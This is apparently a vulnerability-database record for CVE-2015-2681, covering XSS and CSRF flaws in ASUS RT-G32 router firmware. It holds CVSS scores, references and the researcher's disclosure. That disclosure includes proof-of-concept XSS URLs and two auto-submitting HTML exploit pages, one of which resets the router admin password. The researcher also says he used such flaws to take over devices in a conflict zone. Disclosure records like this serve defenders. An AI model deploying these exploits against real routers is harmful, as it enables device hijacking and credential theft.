ID

VAR-201503-0303


CVE

CVE-2015-2681


TITLE

Asus RT-G32 Router Cross-Site Scripting Vulnerability

Trust: 1.2

sources: CNVD: CNVD-2015-01955 // CNNVD: CNNVD-201503-426

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm. ASUS RT-G32 is a wireless router product from ASUS. An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27
http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27

These vulnerabilities work via GET as well as via POST (they work even without authorization).

ASUS RT-G32 XSS-1.html

<html>
<head>
<title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/start_apply.htm" method="post">
<input type="hidden" name="next_page" value="'+alert(document.cookie)+'">
<input type="hidden" name="group_id" value="'+alert(document.cookie)+'">
<input type="hidden" name="action_script" value="'+alert(document.cookie)+'">
<input type="hidden" name="flag" value="'+alert(document.cookie)+'">
</form>
</body>
</html>

Cross-Site Request Forgery (WASC-09):

The CSRF vulnerability allows changing different settings, including the admin's password, as I showed in this exploit (post-auth).

ASUS RT-G32 CSRF-1.html

<html>
<head>
<title>ASUS RT-G32 CSRF exploit (C) 2015 MustLive</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/start_apply.htm" method="post">
<input type="hidden" name="http_passwd" value="admin">
<input type="hidden" name="http_passwd2" value="admin">
<input type="hidden" name="v_password2" value="admin">
<input type="hidden" name="action_mode" value="+Apply+">
</form>
</body>
</html>

I found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansk regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many of my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). I mentioned these vulnerabilities on my site (http://websecurity.com.ua/7644/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Trust: 2.61

sources: NVD: CVE-2015-2681 // JVNDB: JVNDB-2015-001914 // CNVD: CNVD-2015-01955 // BID: 73296 // VULHUB: VHN-80642 // PACKETSTORM: 130724

IOT TAXONOMY

category: ['Network device'] | sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2015-01955

AFFECTED PRODUCTS

vendor: asus | model: rt-g32 | scope: eq | version: 2.0.2.6

Trust: 2.5

vendor: asus | model: rt-g32 | scope: eq | version: 2.0.3.2

Trust: 2.5

vendor: asustek computer | model: rt-g32 | scope: - | version: -

Trust: 0.8

vendor: asustek computer | model: rt-g32 | scope: eq | version: 2.0.2.6

Trust: 0.8

vendor: asustek computer | model: rt-g32 | scope: eq | version: 2.0.3.2

Trust: 0.8

sources: CNVD: CNVD-2015-01955 // BID: 73296 // JVNDB: JVNDB-2015-001914 // CNNVD: CNNVD-201503-426 // NVD: CVE-2015-2681

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-2681
value: MEDIUM

Trust: 1.0

NVD: CVE-2015-2681
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2015-01955
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201503-426
value: MEDIUM

Trust: 0.6

VULHUB: VHN-80642
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2015-2681
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2015-01955
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-80642
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CNVD: CNVD-2015-01955 // VULHUB: VHN-80642 // JVNDB: JVNDB-2015-001914 // CNNVD: CNNVD-201503-426 // NVD: CVE-2015-2681

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-80642 // JVNDB: JVNDB-2015-001914 // NVD: CVE-2015-2681

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201503-426

TYPE

XSS

Trust: 0.6

sources: CNNVD: CNNVD-201503-426

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-001914

PATCH

title: RT-G32 | url: http://www.asus.com/Networking/RTG32/

Trust: 0.8

sources: JVNDB: JVNDB-2015-001914

EXTERNAL IDS

db: NVD | id: CVE-2015-2681

Trust: 3.4

db: PACKETSTORM | id: 130724

Trust: 3.2

db: BID | id: 73296

Trust: 1.4

db: JVNDB | id: JVNDB-2015-001914

Trust: 0.8

db: CNNVD | id: CNNVD-201503-426

Trust: 0.7

db: CNVD | id: CNVD-2015-01955

Trust: 0.6

db: VULHUB | id: VHN-80642

Trust: 0.1

sources: CNVD: CNVD-2015-01955 // VULHUB: VHN-80642 // BID: 73296 // JVNDB: JVNDB-2015-001914 // PACKETSTORM: 130724 // CNNVD: CNNVD-201503-426 // NVD: CVE-2015-2681

REFERENCES

url:http://websecurity.com.ua/7644/

Trust: 3.1

url:http://packetstormsecurity.com/files/130724/asus-rt-g32-cross-site-request-forgery-cross-site-scripting.html

Trust: 3.1

url:http://seclists.org/fulldisclosure/2015/mar/42

Trust: 2.3

url:http://www.securityfocus.com/bid/73296

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2681

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2681

Trust: 0.8

url:http://www.asus.com/

Trust: 0.3

url:http://www.asus.com/networking/rtg32/

Trust: 0.3

url:http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-february/009077.html

Trust: 0.1

url:http://websecurity.com.ua

Trust: 0.1

url:http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27

Trust: 0.1

url:http://websecurity.com.ua/7644/

Trust: 0.1

url:http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27

Trust: 0.1

url:http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html

Trust: 0.1

url:http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27

Trust: 0.1

url:http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27

Trust: 0.1

url:http://site/start_apply.htm

Trust: 0.1

sources: CNVD: CNVD-2015-01955 // VULHUB: VHN-80642 // BID: 73296 // JVNDB: JVNDB-2015-001914 // PACKETSTORM: 130724 // CNNVD: CNNVD-201503-426 // NVD: CVE-2015-2681

CREDITS

MustLive

Trust: 0.4

sources: BID: 73296 // PACKETSTORM: 130724

SOURCES

db: CNVD | id: CNVD-2015-01955
db: VULHUB | id: VHN-80642
db: BID | id: 73296
db: JVNDB | id: JVNDB-2015-001914
db: PACKETSTORM | id: 130724
db: CNNVD | id: CNNVD-201503-426
db: NVD | id: CVE-2015-2681

LAST UPDATE DATE

2024-11-23T21:44:25.751000+00:00


SOURCES UPDATE DATE

db: CNVD | id: CNVD-2015-01955 | date: 2015-03-25T00:00:00
db: VULHUB | id: VHN-80642 | date: 2016-12-03T00:00:00
db: BID | id: 73296 | date: 2015-03-24T00:00:00
db: JVNDB | id: JVNDB-2015-001914 | date: 2015-03-25T00:00:00
db: CNNVD | id: CNNVD-201503-426 | date: 2015-03-24T00:00:00
db: NVD | id: CVE-2015-2681 | date: 2024-11-21T02:27:50.530

SOURCES RELEASE DATE

db: CNVD | id: CNVD-2015-01955 | date: 2015-03-25T00:00:00
db: VULHUB | id: VHN-80642 | date: 2015-03-23T00:00:00
db: BID | id: 73296 | date: 2015-03-24T00:00:00
db: JVNDB | id: JVNDB-2015-001914 | date: 2015-03-25T00:00:00
db: PACKETSTORM | id: 130724 | date: 2015-03-07T11:11:11
db: CNNVD | id: CNNVD-201503-426 | date: 2015-03-24T00:00:00
db: NVD | id: CVE-2015-2681 | date: 2015-03-23T16:59:09.523